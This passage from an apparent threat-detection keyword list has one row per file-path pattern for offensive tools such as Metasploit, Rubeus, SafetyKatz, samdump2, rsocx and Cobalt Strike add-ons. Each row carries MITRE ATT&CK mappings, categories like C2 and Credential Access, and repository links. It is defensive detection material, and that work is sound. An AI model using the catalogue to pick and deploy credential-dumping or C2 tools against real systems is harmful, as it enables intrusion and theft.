T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rservices_from_users.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/rsocx-*-linux-x86-64.zip*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*/rsocx-*-windows-x86-64.zip*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*/rsocx.exe*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*/rsocx.git*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*/rsync-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rsync-list-modules.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rtsp-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rtsp-url-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Rubeus*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*/Rubeus/*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*/Rudrastra.git*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,1,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*/rulerforms.go*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*/run/leet.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/run_as_psh.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/RunasCs.cs*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,0,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*/RunasCs.git*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*/RunasCs.git*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*/RunasCs.zip*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*/RunAsWinTcb.git*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense 
Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*/RunAsWinTcb.iml*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*/runcalc.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/rundll32.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/rundll32_js*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/RunOF/RunOF/*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/runshellcode.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*/RuralBishop.git*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 
- T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*/rusers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rusthound.exe*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,1,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*/RustHound.git*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,1,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*/rvrsh3ll/*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*/RWXfinder.git*,offensive_tool_keyword,rwxfinder,The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section,T1059.001 - T1059.003 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Discovery,https://github.com/pwnsauc3/RWXFinder,1,1,N/A,5,1,89,12,2023-07-15T15:42:55Z,2023-07-14T07:47:21Z -*/S3cur3Th1sSh1t/*,offensive_tool_keyword,cobaltstrike,C# binary with embeded golang hack-browser-data,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData,1,1,N/A,10,10,84,15,2021-12-09T18:58:27Z,2020-12-06T12:28:47Z -*/S3Scanner.git*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,1,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*/s4n7h0/NSE*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*/S4UTomato.git*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*/s7-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/saefko.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/Safer_PoC_CVE*,offensive_tool_keyword,POC,A Safer PoC for CVE-2022-22965 (Spring4Shell),T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/colincowie/Safer_PoC_CVE-2022-22965,1,1,N/A,N/A,1,45,7,2022-05-27T12:56:40Z,2022-03-31T16:58:56Z -*/SafetyKatz.git*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. 
the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*/sam_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/samba-vuln-cve-2012-1182.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/samdump.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/samdump2*,offensive_tool_keyword,samdump2,Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://salsa.debian.org/pkg-security-team/samdump2,1,0,N/A,10,6,N/A,N/A,N/A,N/A -*/samruser.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/sap_default.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sc_inject/inject/*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*/scan4all.git*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/scan4all/lib/api*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/scan4all/lib/util*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation 
tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/scanner/discovery*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/scanner/kerberos*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/scanner/pcanywhere*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/scanner/portscan*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
